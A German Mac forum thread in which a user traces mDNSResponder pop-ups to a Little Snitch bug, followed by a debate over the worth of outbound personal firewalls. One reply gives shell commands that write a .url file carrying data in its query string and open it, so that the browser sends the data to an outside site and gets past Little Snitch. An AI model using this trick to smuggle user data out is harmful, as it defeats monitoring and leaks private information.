Forum>Netzwerke>mDNSResponder nervt plötzlich mit Popups

mDNSResponder nervt plötzlich mit Popups

Esäk
Esäk17.05.0912:53
Seit gestern popt bei jedem Rechnerstart eine Anfrage auf bez. mDNSResponder nach der Erlaubnis einer Verbindung zu 224.0.0.251 über Port 5353, also ein Multicast.
Ich habe die Firewall deaktiviert und stattdessen Little Snitch am Laufen, das aber 1. sowieso alle UDP-Port für mDNSResponder deaultmäßig offen hat und 2. selbst wenn ich für mDNSResponder alle Ports zu allen Adressen immer erlaube popt dieses doofe Abfrage doch bei jedem Neustart auf.
Noch besser ist, dass beim Aussachalten ebenfalls so ein Popup kommt und diesmal sogar mit ner IPv6 Adresse (ff02::fb) obwohl ich IPv6 auch deaktiviert habe.

Der entsprechende Logeintrag beim Start des Systems bringt mich auch nicht weiter:
17.05.09 12:20:37 mDNSResponder[16] mDNSPlatformSendUDP sendto failed to send packet on InterfaceID 0080A000   lo0/4 to 224.0.0.251:5353 skt 7 error -1 errno 64 (Host is down) 34568677 

und die Suche im Forum war auch nicht zielführend.

In den Apple Discussions gibt es eine ähnliche Anfrage:
http://discussions.apple.com/thread.jspa?threadID=2008993&ts tart=0
- ohne Auflösung

PS: Warum tut denn die Formulierung [ url=Adresse ] Beschreibung [ /url ] hier im Forum nicht wie man das erwarten würde?
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0

Kommentare

Esäk
Esäk17.05.0914:07
Niemand ne Idee?
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
DonQ
DonQ17.05.0914:15
hmm ?

afair muss man doch multicast extra erlauben in der firewall
„an apple a day, keeps the rats away…“
0
Esäk
Esäk17.05.0916:41
Danke. Ich schrieb, dass ich die Firewall deaktiviert habe.
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
DonQ
DonQ17.05.0917:00
http://de.wikipedia.org/wiki/Multicast

apple talk aktiv ?

da schrieb apple das es probleme geben kann…

kann dir aber auch nicht wirklich helfen, da ich multicast blocke in der hw firewall…und so was nicht habe.
„an apple a day, keeps the rats away…“
0
ghostbuster
ghostbuster17.05.0917:23
das gleiche problem hatte ich auch mit der neuesten little snitch version, bin wieder zurück auf die vorletzte version und gut war.
0
Esäk
Esäk17.05.0917:30
Was wirklich Systematisches kann es ja nicht sein, denn mein Mac Mini und das MBP haben das Problem trotz gleicher Version von Little Snitch und ebenfalls 10.5.7 nicht.
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
Esäk
Esäk17.05.0922:40
Jupheidiheido! Gelöst!


Es war wohl ein Bug in Little Snitch 2.1.1.
Der nightly build:
hat es gebracht. Es wurde u.A. die Default-Regeln leicht verändert vom Autor.
Null Problemos mehr jetzt.
Danke für eure Mühen!

Die Sache mit den URL-Tags hier im Forum klemmt aber immer noch
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
Garp200018.05.0915:17
LOL Little Stich löst die Firewall-Probleme die es ohne ihn nicht gäbe. In der c't von letzter Woche ist ein netter Satz zum Schwachfug Personal Firewalls (bevor jetzt jemand meckert, bitte erst mal lesen was die c't schreibt).
„Star of CCTV“
0
DonQ
DonQ18.05.0916:24
hmm, ein link wäre nett, solange da nicht nur positive false behandelt wird und das man sich ab und zu schlicht selber aussperrt

„an apple a day, keeps the rats away…“
0
Garp200018.05.0916:30
Der Artikel ist sogar online verfügbar, habe ihn eben gefunden:

http://www.heise.de/ct/Falscher-Firewall-Alarm--/hotline/137 251

Zitat:

"Das Beispiel illustriert das grundsätzliche Problem von Firewalls, die neben der ankommenden auch die abgehende Kommunikation filtern: Heutzutage sucht fast jedes Programm nach Updates oder zapft Online-Datenbanken an, greift also mit guten Absichten auf das Netz zurück. Firewalls sind jedoch nicht dazu in der Lage, die Legitimität von Verbindungsversuchen einzuschätzen. [...] Selbst die Blockade der gesamten abgehenden Kommunikation garantiert keinen dichten Rechner oder ersetzt gar einen Virenscanner. Die notwendigen Ausnahmeregeln für den Browser und E-Mail-Client bieten genug Spielraum, gezielt Informationen herauszuschmuggeln. Sinnvoller ist es also, lediglich den unerwünschten Verkehr von außen abzuwehren [...]."

Meiner Meinung nach ist damit alles zum Thema gesagt. Ein Ansatz der zu kurz greif, nichts als dämliche Nervdialoge und in Sachen Sicherheit kein Zugewinn.
„Star of CCTV“
0
DonQ
DonQ18.05.0919:59
hmm, man kann auch damit lernen …sowieso dient(e) eine personal firewall im rechner mit anderen tools dazu, microsoft den zugang und das abschalten der winversion massiv zu erschweren, bzw. zu verhindern und wenn nicht mal microsoft den rechner lahm legen kann, wird es so schnell auch kein anderer können, yust my 2 cents.

„an apple a day, keeps the rats away…“
0
Rantanplan
Rantanplan18.05.0921:00
Garp2000
"Die notwendigen Ausnahmeregeln für den Browser und E-Mail-Client bieten genug Spielraum, gezielt Informationen herauszuschmuggeln."

Der Artikel vermischt ein paar Halbwahrheiten und baut daraus einen Turm aus Grütze Ausnahmeregeln für Browser und Email-Client kann man - ohne kriminelle Energie - nur ausnutzen, wenn es sich um einen reinen Paketfilter handelt. Little Snitch (und andere) berücksichtigen aber auch die Applikation, die eine Verbindung herstellen will.

Eine Applikation wie Little Snitch ist natürlich kein Schutz vor unerwünschten Datenübertragungen, schließlich kuckt es nur OB eine Verbindung aufgebaut wird und nicht WAS übertragen wird. Trotzdem ist es i.A. gut zu wissen, welche Applikation unter welchen Umständen Verbindungen aufbauen will. LS ist kein Packet Sniffer, sondern ein kleines Hilfsmittel um zu wissen wer wann senden will. Wissen hat noch niemandem geschadet.
„Wenn ich nicht hier bin, bin ich auf dem Sonnendeck“
0
Garp200018.05.0921:03
Trugschluss. Das eine hat doch nichts mit dem anderen zu tun. Microsoft schickt seine Daten halt nicht über andere Ports oder getarnt als E-Mail raus, wenn jemand mit einem geklauten Windows arbeitet. Somit lässt sich die Prüfung bis dahin halt sabotieren. Ein Programmierer von Schadsoftware dagegen wird das tun was funktioniert, wie elegant oder wacklig das ganze ist, ist ihm egal wenn er sein Ziel erreicht.
„Star of CCTV“
0
Garp200018.05.0921:09
Rantanplan Ja is klar, hier im Forum alle die Weisheit mit dem Löffel gefressen. Und andere Meinung eh nicht denkbar. Speziell bei der c't nur Anfänger an der Schreibmaschine.

Werd doch mal konkreter wie eine Anwendung nicht über Regeln die das Mailing erlauben bzw. einfach gleich per Mail Client Daten abtransportieren soll. Das Betriebssystem das das verhindert möchte ich mal sehen, genauso wie die Firewall die da aufmuckt. Das Dilemma ist schlicht nicht lösbar außer man betrachtet den Inhalt aller Datenpakete die nach draussen gehen und verwirft außerdem alle Pakete die man nicht versteht/verschlüsselt sind. Oder man macht einen Audit des Source codes.

Du ignorierst ja geflissentlich die Aussage der c't, dass eben heutzutage jedes Programm auch ganz legitim Daten austauscht. Und davon willst Du die Hälfte filtern? Wohl kaum, wenn alles. Das ist aber Murks unter der genannten Annahme und auch vgl. mit dem Problem des Threaderöfferns.

Und bei einem Trojaner davon auszugehen, dass nicht auch kriminelle Energie im Spiel sein könnte, ist wohl eher ein Scherz, oder?

Ich behaupte mal unter Win sind Personal Firewalls 20x ausgefeilter als das Spielzeug Litte Snitch und trotzdem stehen die auf verlorenen Posten.
„Star of CCTV“
0
Esäk
Esäk18.05.0921:26
Garp2000
Nur mal langsam. Rantanplan hat schon im Kern recht und Du polemisierst hauptsächlich rum, indem Du anderen eine ignorante Haltung unterstellst, was selbst hochgradig arrogant ist in meinen Augen.

Ob nämlich eine Applikation "legitim" Daten mit irgendetwas austauscht, das ist nicht an sich durch die Götter festgelegt, sondern das möchte an meinem Rechner ich ganz einfach selbst beurteilen und entscheiden. Und wenn ich diese Telefonitis im konkreten Fall nicht will, dann möchte ich das stoppen können, ohne Hersteller oder Apple oder Dich nach Deiner Meinung fragen zu müssen. Capice?
Das ist legitim, finde ich.
Und genau das erledigt Little Snitch für mich und noch viel mehr.
Auf der Suche danach, was eine Webseite so alles nachlädt ist der Monitor von LS eine große Hilfe, ohne dass ich mich durch Quelltexte von Seiten kämpfen muss. Und wenn ich bestimme Server wegblocken will, dann kann ich das mit LS. Und ich kann noch andere Dinge für mich sehr einfach realisieren.
MaW. für mich ist LS ein tolles Stück Software und tut das was es soll ausgezeichnet.
Dieser Bug ist eben ein klassischer Bug, wie er bei vielen Tools einmal vorkommt und wie er kaum im Voraus zu berechnen ist. Und dass der Software-Autor so schnell reagiert, das würden wir uns von vielen anderen Firmen wünschen.
Von daher finde ich Deinen hämischen Kommentar einfach nur deppert und sonst überhaupt nichts. Mit Deinen Worten: Schwachfug.
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
Garp200018.05.0922:38
Okok, so sollte das nicht rüberkommen. Vielleicht etwas übers Ziel hinaus geschossen, sorry.
„Star of CCTV“
0
Esäk
Esäk18.05.0922:54
Gut. Sogar super, denn Einsicht ist ein seltenes Gut heutzutage. Ich hab Dich wieder lieb
„Die Todesstrafe gehört auch in Hessen abgeschafft!“
0
MacMark
MacMark19.05.0908:23
Rantanplan
Garp2000
"Die notwendigen Ausnahmeregeln für den Browser und E-Mail-Client bieten genug Spielraum, gezielt Informationen herauszuschmuggeln."

Der Artikel vermischt ein paar Halbwahrheiten und baut daraus einen Turm aus Grütze Ausnahmeregeln für Browser und Email-Client kann man - ohne kriminelle Energie - nur ausnutzen, wenn es sich um einen reinen Paketfilter handelt. Little Snitch (und andere) berücksichtigen aber auch die Applikation, die eine Verbindung herstellen will.
...

Little Snitch wird gern als "Security"-Programm eingeordnet. Ich halte das für einfältig, denn betrachte mal folgendes Szenario:
Little Snitch benutzt Regeln, die festlegen, welches Programm auf welchem Port Daten rausschicken darf, meinetwegen auch noch, an wen es die schicken darf. Klingt gut, gelle?
So: Deinem Browser wirst Du jede ausgehende Kommunikation auf Port 80 erlauben müssen, egal wohin. Wenn nicht, ist Dein Browser praktisch nutzlos.
Es ist nun aber denkbar, daß ein "unartiges" Programm die Daten gar nicht selbst rausschickt, sondern dem Browser mitteilt, er möge eine bestimmte URL ansurfen und in der URL übergibt man dann ganz viele Daten. Das ist für den Browser technisch so, als wenn Du hier einen Kommentar postest. Die eigentliche Verbindung macht dann der Browser auf und die Daten schickt auch der Browser raus.

Beispiel: Im Terminal diesen Befehl, den jedes Programm absetzen könnte:
echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_ to _us" > badboy.url
Und dann diesen:
open badboy.url
Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch. Mit Zeilenumbruch am Ende sollte es nicht nur auf OS X so klappen.

Man kann also leicht Little Snitch ausweichen. Ich habe das nicht selbst ausprobiert, aber vielleicht testet das mal jemand, der Little Snitch benutzt

Little Snitch installiert meines Wissens eine Kernel-Extension. Prozesse unter root sind immer beliebtes Angriffsziel. Fällt der Prozeß, ist das System meistens Toast (falls nicht sandboxed, siehe meine Seite). Hat Little Snitch einen Bug, hat man ein Problem, denn Little Snitch liest ja jeden ausgehenden Verkehr und ist damit leicht zu erreichen.

Fragen: Blockt Little Snitch eigenen Nach-Hause-Verkehr? Vertraut man dem Entwickler des Programmes? Kann man in den Quellcode schauen?

Es gibt auch andere Wege, den Netzverkehr von Programmen zu überwachen, ohne Little Snitch: netstat, tcpdump etc. Alles Bordmittel.

Ich bin sehr vorsichtig damit, was ich als root laufen lasse. Little Snitch läuft bei mir jedenfalls nicht.
„@macmark_de“
0
Garp200019.05.0908:47
Sehr schönes Beispiel. Und ich liebe ja solche Diskussionen, da lernt jeder was.
„Star of CCTV“
0

Kommentieren

Diese Diskussion ist bereits mehr als 3 Monate alt und kann daher nicht mehr kommentiert werden.

OK MacTechNews.de verwendet Cookies unter anderem für personalisierte Inhalte, Seitenanalyse und bei der Auslieferung von Google-Anzeigen. Dies war zwar schon immer so, auf Wunsch der EU muss nun jedoch explizit darauf hingewiesen werden. Durch Nutzung der Website erklären Sie sich damit einverstanden. Weitere Informationen